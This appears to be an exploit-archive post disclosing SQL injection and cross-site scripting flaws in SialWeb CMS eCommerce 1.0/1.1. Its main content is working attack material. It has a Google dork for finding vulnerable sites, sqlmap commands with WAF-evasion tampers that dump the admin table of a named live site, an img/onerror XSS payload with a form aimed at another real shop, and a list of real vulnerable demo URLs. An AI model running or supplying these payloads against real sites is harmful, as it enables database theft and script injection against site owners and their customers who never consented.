SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection

SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection: Posted Mar 24, 2020; Authored by thelastvvv; SialWeb CMS eCommerce versions 1.0 and 1.1 suffer from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | a7e271d0bde3253b7c7ebef175d6d35518185be729ce0159a946f2eb421f79a4; Download | Favorite | View

SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection

# Exploit Title: SialWeb CMS SQL Injection & XSS Vulnerability
# Google Dork: intext:" By Sial Web" +inurl:/.php?id=
# Date: 2020-03-22
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://sialweb.net/
# Tested on: Ubuntu

---------------------------------------------------------

PoC 1:
The remote sql injection web vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce follow the provided information and steps below to continue.

Payload(s)

http://www.zaryabind.com/about.php?Id=[]'[SQL INJECTION VULNERABILITY!]

SQLMAP Payload(s):

sqlmap -u http://www.zaryabind.com/about.php?Id=4 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u http://www.zaryabind.com/about.php?Id=4 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D zaryabin_db --tables

sqlmap -u http://www.zaryabind.com/about.php?Id=4 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D zaryabin_db  -T tbl_admin

*Note: once you get the db name you can skip the other steps and directly get "tbl_admin" data (you can use command 1 and 3 ..above )

PoC 2 :

XSS Vulnerability

Payload(s) :

in Search box use payload:
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>

<html>
  <body>

<div id="search-category" class="input-group">
                                <form class="search-box" action="https://www.megafightgear.com.pk/search.php" method="post">

                                    <input class="form-control" placeholder="Search here..." id="text-search" name="tsearch" value="<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>" type="search">
                                    <button id="btn-search-category" type="submit">
                                      <i class="fa fa-search">&nbsp;</i>
                                    </button>
                                </form>
                            </div>
  </body>
</html>

demo(s):

http://www.zaryabind.com/about.php?Id=4%27
https://www.megafightgear.com.pk/about.php?Id=1%27
http://www.aplus.com.pk/about.php?Id=3

Sent with [ProtonMail](https://protonmail.com) Secure Email.

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection

SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection

Share This

SialWeb CMS eCommerce 1.0 / 1.1 Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems